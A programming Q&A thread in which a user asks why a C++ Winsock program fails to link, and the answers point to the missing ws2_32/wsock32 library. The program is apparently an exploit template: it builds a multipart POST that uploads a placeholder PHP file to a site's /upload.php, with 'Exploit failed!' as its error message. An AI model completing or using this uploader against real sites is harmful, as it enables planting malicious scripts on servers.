# compile simple application give error

Tags: c++

Im trying complile this simple application :

```
#include <winsock2.h>
#include <iostream.h>
#include <string.h>

using namespace std;
unsigned long WinsockStart()

{

WSADATA wsa;
unsigned long ULONG;
struct hostent *target;

if(WSAStartup(MAKEWORD(2,2), &wsa) < 0)
{
cout << "Exploit failed!" << endl;

WSACleanup();
return 1;
}

if((target=gethostbyname("www.website.com/script.php"))<0)
{
cout << "That is not a valid host bro!" << endl;

WSACleanup();
return 2;
}

ULONG = *(unsigned long*) target->h_addr;
return ULONG;
}

void error_exit(string text)
{
cout << text;
WSACleanup();
exit(EXIT_FAILURE);
}

int main()
{
SOCKET sock;
struct sockaddr_in addr;
unsigned long win=0;
int con = 0, gr=0, send_r=0, rec=0;
char header[2048], buffer[2018];
string to_send="Paste the php script hire";
string name ="file.php";

win=WinsockStart();
if(win==1||win==2)
error_exit("failed!");

addr.sin_family=AF_INET;
addr.sin_port=htons(80);
addr.sin_addr.s_addr = win;

sock = socket(AF_INET, SOCK_STREAM, 0);

if(sock<0)
error_exit("failed!");

gr = (to_send.size()+name.size()+287);

sprintf(header, "POST /upload.php HTTP/1.1\r\n");
sprintf(header, "%sHost: www.website.com/script.php\r\n", header);
sprintf(header, "%sConnection: Keep-Alive\r\n", header);
sprintf(header, "%sContent-Type: multipart/form-data; boundary=---------------------------90721038027008\r\n", header);
sprintf(header, "%sContent-Length: %d\r\n", header, gr);
sprintf(header, "%s\r\n", header);
sprintf(header, "%s-----------------------------90721038027008\r\n", header);
sprintf(header, "%sContent-Disposition: form-data; name=\"images\"; filename=\"%s\"\r\n", header, name.c_str());
sprintf(header, "%sContent-Type: text/plain\r\n", header);
sprintf(header, "%s\r\n", header);
sprintf(header, "%s%s\r\n", header, to_send.c_str());
sprintf(header, "%s-----------------------------90721038027008\r\n", header);
sprintf(header, "%sContent-Disposition: form-data; name=\"post\"\r\n", header);
sprintf(header, "%s\r\n", header);
sprintf(header, "%supload\r\n\r\n", header);
sprintf(header, "%s-----------------------------90721038027008--\r\n\r\n\0", header);      

con = connect(sock, (SOCKADDR*)&addr, sizeof(addr));
if(con < 0)
error_exit("failed!");

if(send_r=send(sock, header, strlen(header), 0)<0)
error_exit("failed!");

while (rec=recv(sock, buffer, 2048, 0)) /* 2048Bytes Usage */
{
if(rec==0)
error_exit("Quit it!");
printf("%s", buffer);
}

closesocket(sock);
WSACleanup();
return EXIT_SUCCESS;
}
```

and give me this error :

```
Compiler: Default compiler
Executing  g++.exe...
g++.exe "C:\Users\Lavoro\Desktop\upload.cpp" -o "C:\Users\Lavoro\Desktop\upload.exe"    -I"C:\Dev-Cpp\lib\gcc\mingw32\3.4.2\include"  -I"C:\Dev-Cpp\include\c++\3.4.2\backward"  -I"C:\Dev-Cpp\include\c++\3.4.2\mingw32"  -I"C:\Dev-Cpp\include\c++\3.4.2"  -I"C:\Dev-Cpp\include"   -L"C:\Dev-Cpp\lib" 
In file included from C:/Dev-Cpp/include/c++/3.4.2/backward/iostream.h:31,
                 from C:\Users\Lavoro\Desktop\upload.cpp:2:
C:/Dev-Cpp/include/c++/3.4.2/backward/backward_warning.h:32:2: warning: #warning This file includes at least one deprecated or antiquated header. Please consider using one of the 32 headers found in section 17.4.1.2 of the C++ standard. Examples include substituting the <X> header for the <X.h> header for C++ includes, or <iostream> instead of the deprecated header <iostream.h>. To disable this warning use -Wno-deprecated.

C:\Users\Lavoro\AppData\Local\Temp/ccMleaaa.o(.text+0x11b):upload.cpp: undefined reference to `WSAStartup@8'
C:\Users\Lavoro\AppData\Local\Temp/ccMleaaa.o(.text+0x14b):upload.cpp: undefined reference to `WSACleanup@0'
C:\Users\Lavoro\AppData\Local\Temp/ccMleaaa.o(.text+0x163):upload.cpp: undefined reference to `gethostbyname@4'
C:\Users\Lavoro\AppData\Local\Temp/ccMleaaa.o(.text+0x1b2):upload.cpp: undefined reference to `WSACleanup@0'
C:\Users\Lavoro\AppData\Local\Temp/ccMleaaa.o(.text+0x462):upload.cpp: undefined reference to `htons@4'
C:\Users\Lavoro\AppData\Local\Temp/ccMleaaa.o(.text+0x48b):upload.cpp: undefined reference to `socket@12'
C:\Users\Lavoro\AppData\Local\Temp/ccMleaaa.o(.text+0x6fc):upload.cpp: undefined reference to `connect@12'
C:\Users\Lavoro\AppData\Local\Temp/ccMleaaa.o(.text+0x81c):upload.cpp: undefined reference to `send@16'
C:\Users\Lavoro\AppData\Local\Temp/ccMleaaa.o(.text+0x936):upload.cpp: undefined reference to `recv@16'
C:\Users\Lavoro\AppData\Local\Temp/ccMleaaa.o(.text+0xb0e):upload.cpp: undefined reference to `closesocket@4'
C:\Users\Lavoro\AppData\Local\Temp/ccMleaaa.o(.text+0xb16):upload.cpp: undefined reference to `WSACleanup@0'
collect2: ld returned 1 exit status

Execution terminated
```

where is the problem ? im use dev c++ whit windows 7 home. If i need install any library please specificate me the name of library need install. thank you all

Comment: Why are you using GCC 3.4.2?

Answer (score 0, accepted):

You missing **ws2_32.lib** in your linker option. To do so

Go to project properties-->Linker-->inputs-->Additional Dependencies (Add ws2_32.lib in text box)

Answer (score 7):

It's not a compilation error, it's linker errors. It tells you that it can't find the Windows socket function, because you don't link with the wsock32 library.

Edit your project settings to add it.

Comment: and how can resolve this problem ?

Comment: @PythonFun: By reading the documentation for GCC.